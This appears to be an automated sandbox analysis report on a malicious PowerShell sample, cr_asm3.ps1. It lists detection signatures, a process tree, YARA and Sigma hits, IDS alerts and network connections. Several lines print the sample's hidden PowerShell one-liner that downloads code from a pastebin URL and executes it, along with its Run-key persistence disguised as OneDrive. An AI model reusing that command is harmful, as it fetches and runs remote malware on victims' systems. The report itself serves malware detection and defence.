
Windows Analysis Report
cr_asm3.ps1

Overview

General Information

Sample name: cr_asm3.ps1
Analysis ID: 1534234
MD5: b1e2bf28f0bb077edc92a81173ccbbfa
SHA1: 425c6a7ae95888820b4411730475fa9b19cdb6f3
SHA256: 682551bed0e0e7aaba3274d84d5fc80a04b926ac1e4a78e5e312eb2ffd7a5012
Tags: Neth3N, ps1, user-JAMESWT_MHT

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to inject threads in other processes
Powershell creates an autostart link
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 2120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 2980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • Stand_Trainer_Updated.exe (PID: 4504 cmdline: "C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe" MD5: BECD67D75C5E7C2411E9F481086CA1E0)
    • attrib.exe (PID: 7588 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
  • svchost.exe (PID: 6524 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • forfiles.exe (PID: 7396 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7468 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 7764 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7832 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 6648
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x78507:$b1: ::WriteAllBytes(
  • 0xdc8ba:$s1: -join
  • 0xdc8f5:$s1: -join
  • 0xdc9bc:$s1: -join
  • 0xdc9ea:$s1: -join
  • 0xdcba6:$s1: -join
  • 0xdcbc9:$s1: -join
  • 0xdce7d:$s1: -join
  • 0xdce9e:$s1: -join
  • 0xdced0:$s1: -join
  • 0xdcf18:$s1: -join
  • 0xdcf45:$s1: -join
  • 0xdcf6c:$s1: -join
  • 0xdcf9d:$s1: -join
  • 0xdcfbf:$s1: -join
  • 0xdd08c:$s1: -join
  • 0xdd520:$s1: -join
  • 0xdd542:$s1: -join
  • 0xdd59a:$s1: -join
  • 0xdd5c4:$s1: -join
  • 0xdd5f8:$s1: -join
Source: Process Memory Space: powershell.exe PID: 7548
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x9f5f4:$b1: ::WriteAllBytes(
  • 0xe5652:$b1: ::WriteAllBytes(
  • 0x8215e:$s1: -join
  • 0x828bf:$s1: -join
  • 0x11e1c4:$s1: -join
  • 0x16bc06:$s1: -join
  • 0xdeb9:$s3: reverse
  • 0x127f3:$s3: reverse
  • 0x1c615:$s3: reverse
  • 0x27fc6:$s3: reverse
  • 0x57278:$s3: reverse
  • 0x5deac:$s3: reverse
  • 0x5ff99:$s3: reverse
  • 0x6afc8:$s3: reverse
  • 0xbd545:$s3: reverse
  • 0xbd833:$s3: reverse
  • 0xbdf4d:$s3: reverse
  • 0xbe706:$s3: reverse
  • 0xc5954:$s3: reverse
  • 0xc5d6e:$s3: reverse
  • 0xc68f6:$s3: reverse
Source: Process Memory Space: powershell.exe PID: 7912
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x2bc1e:$b1: ::WriteAllBytes(
  • 0x88b08:$b1: ::WriteAllBytes(
  • 0x34b73:$s1: -join
  • 0x551ea:$s1: -join
  • 0x192066:$s1: -join
  • 0x1927c6:$s1: -join
  • 0xa34ed:$s3: reverse
  • 0xad523:$s3: reverse
  • 0xe0ac5:$s3: reverse
  • 0xec1fe:$s3: reverse
  • 0x10d32b:$s3: reverse
  • 0x113fad:$s3: reverse
  • 0x115e40:$s3: reverse
  • 0x120e6f:$s3: reverse
  • 0x13eb44:$s3: reverse
  • 0x13ee32:$s3: reverse
  • 0x13f54c:$s3: reverse
  • 0x13fd05:$s3: reverse
  • 0x146c43:$s3: reverse
  • 0x14705d:$s3: reverse
  • 0x147be5:$s3: reverse
Source: amsi64_7548.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process
Source: amsi64_7912.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x9a92:$b1: ::WriteAllBytes(
  • 0x8197:$s1: -join
  • 0x1943:$s4: +=
  • 0x1a05:$s4: +=
  • 0x5c2c:$s4: +=
  • 0x7d49:$s4: +=
  • 0x8033:$s4: +=
  • 0x8179:$s4: +=
  • 0xc1bc:$s4: +=
  • 0xc23c:$s4: +=
  • 0xc302:$s4: +=
  • 0xc382:$s4: +=
  • 0xc558:$s4: +=
  • 0xc5dc:$s4: +=
  • 0x9b2c:$e4: Get-WmiObject
  • 0x9bce:$e4: Get-WmiObject
  • 0xa6a5:$e4: Get-WmiObject
  • 0xa894:$e4: Get-Process
  • 0xa8ec:$e4: Start-Process

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7396, ParentProcessName: forfiles.exe, ProcessCommandLine: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)', ProcessId: 7468, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ProcessId: 6648, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", ProcessId: 2120, ProcessName: csc.exe
Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 2120, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP", ProcessId: 2980, ProcessName: cvtres.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6648, TargetFilename: C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ProcessId: 6648, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6524, ProcessName: svchost.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline", ProcessId: 2120, ProcessName: csc.exe
Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-10-15T18:08:12.766333+0200  2803274  2         Potentially Bad Traffic        192.168.2.7  49703        185.199.109.133  443               TCP

Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-10-15T18:08:42.150593+0200  2857659  1         A Network Trojan was detected  192.168.2.7  49852        162.159.138.232  443               TCP
2024-10-15T18:08:49.372385+0200  2857659  1         A Network Trojan was detected  192.168.2.7  49889        162.159.138.232  443               TCP

Timestamp                        SID      Severity  Classtype                      Source IP    Source Port  Destination IP   Destination Port  Protocol
2024-10-15T18:08:27.991660+0200  2857658  1         A Network Trojan was detected  192.168.2.7  49775        162.159.138.232  443               TCP


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49764 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49772 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49775 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49810 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49821 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49852 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49889 version: TLS 1.2
Source: Binary string: \??\C:\Windows\mscorlib.pdbl] source: powershell.exe, 0000000C.00000002.1746802564.000002927D9E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll\YC source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb4e089 source: powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbAf9(@ source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdbhP source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: n.pdb$ source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb] source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbw source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.pdb source: powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1549184232.0000026CA964F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1746099211.000002927D9D7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbk source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbG source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb: source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbl source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb? source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbY source: powershell.exe, 00000011.00000002.1849255470.00000240989C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs source: powershell.exe, 00000001.00000002.1549184232.0000026CA96D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbpw source: powershell.exe, 00000001.00000002.1549184232.0000026CA95F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdbc source: powershell.exe, 00000001.00000002.1549184232.0000026CA95E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb9 source: powershell.exe, 00000011.00000002.1844743189.000002409836A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1745296458.000002927D952000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1844743189.000002409836E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.1846512866.000002409890E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1846512866.00000240989A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdbpdblib.pdbA* source: powershell.exe, 00000001.00000002.1509846043.0000026C91352000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 0000000C.00000002.1745296458.000002927D966000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 00000001.00000002.1509139350.0000026C8F3BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbc source: powershell.exe, 0000000C.00000002.1747621659.000002927DA16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1747689260.000002927DA1B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1746099211.000002927D9A4000.00000004.00000020.00020000.00000000.sdmp
